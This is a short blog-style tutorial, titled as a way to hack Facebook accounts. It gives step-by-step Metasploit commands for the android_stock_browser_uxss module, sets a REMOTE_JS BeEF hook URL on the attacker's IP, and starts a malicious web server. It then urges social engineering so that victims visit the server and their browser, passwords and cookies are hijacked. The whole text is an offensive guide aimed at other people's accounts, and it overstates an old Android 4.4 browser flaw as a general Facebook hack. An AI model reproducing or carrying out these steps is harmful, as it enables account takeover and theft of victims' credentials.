HACK FACEBOOK ACCOUNT WITH YOU ANDROID OR KALI LINUX
There are tons of articles out there for articles on how to hack Facebook accounts and how to hack Facebook passwords. Many sites are even asking for money and surveys. Especially the Facebook online hacker tools that clam in to hack facebook just be using the victim’s username. These are fake.
Do not fall victims to these scams. There is no magic facebook hacking method. There are only some methods of exploiting vulnerabilities of Facebook, systems, and browsers and our dear old friend social engineering, which can be used to hack Facebook passwords.
Frameworks like Metasploit and BeEF can be used to hack a Facebook account via the browser. We will describe the method for the same in this article.
So with that out of the way, I will show you how you can hack Facebook with Metasploit and BeEF exploitation framework.
Following are some of the requirements you need to meet:
Install Kali Linux
Have a good Internet Connection
Have patience
Following are the steps to use to hack Facebook using Metasploit
Step 1: Start Kali Linux and open Metasploit
Let’s startup our Kali machine and then open Metasploit. By default its available on the left-hand sidebar. The one with a big “M” is Metasploit
You can also use the terminal to start Metasploit with the following command:
kali > msfconsole
Step 2: Find the right Exploit to use
Next, let’s find the perfect Exploit for this hack. In our case the exploit is the:
auxiliary/gather/android_stock_browser_uxss exploit
Let’s load that exploit by typing the following command:
msf5 > use auxiliary/gather/android_stock_browser_uxss
Step 3: Get the Exploit Info
Now that we have loaded the exploit module, let’s get some detailed information on this exploit. We can do this by using the following command:
msf5 > info
As you can see from this info page, this Exploit is targeted at kit kat android version 4.4 stock browser. You can read all the relevant information on Metasploit terminal, as shown below.
Step 4: Show and configure options
Next, let see the options we need to set for this Exploit to work.
We need to set the “REMOTE_JS” setting shown below to hook the victim with BeEF.
Step 5 Open BeEF framework
Now, open BeEF (Browser exploitation framework). By using this tool, we can easily hijack the victim’s browser and get all the passwords and cookies.
You can open BeEF, as shown below.
Once you open BeEF, it will ask you to enter a new password.
Once you have done that BeEf server will start and you will see the following page:
The default credentials are “beef” for username and the new password you just set.
Step 6 Setting JS to BeEF Hook
Back to Metasploit console now. To hack the victim’s Facebook account, we need to get access to the victim’s browser data. For this, we need to set the REMOTE_JS to the hook on BeEF.
For using this hack, make sure you use the correct IP:
syntax: set REMOTE_JS http://yourip:3000/hook.js
So in my case, this Metasploit command becomes
msf5> set REMOTE_JS http://192.168.128.182:3000/hook.js
Now, we need to set the URIPATH to the root directory /.
So type:
msf5> set uripath /
Step 7: Running the Metasploit Web Server
Now we need to start the Metasploit web server which will host the BeEF hook so that when anyone visits our Website, their browser will be hooked to BeEF.
Start the server by using the Run command
msf > run
Step 8: Wait for the victim to visit the Website from an Android Browser
This step requires social engineering. Make sure you make the victim click the link by using attractive and catchy colours and stuff.
Step 9: Hooking the browser on BeEF via Metasploit
When the victim visits our malicious webserver at 192.168.128.182, the BeEF JavaScript will hook their android browser. It will appear under the “Hooked Browser” section in BeEF as shown below. You can now control their android browser and data.
Congratulations, you have successfully learned hacking facebook accounts with Metasploit and BeEF framework.
Post a Comment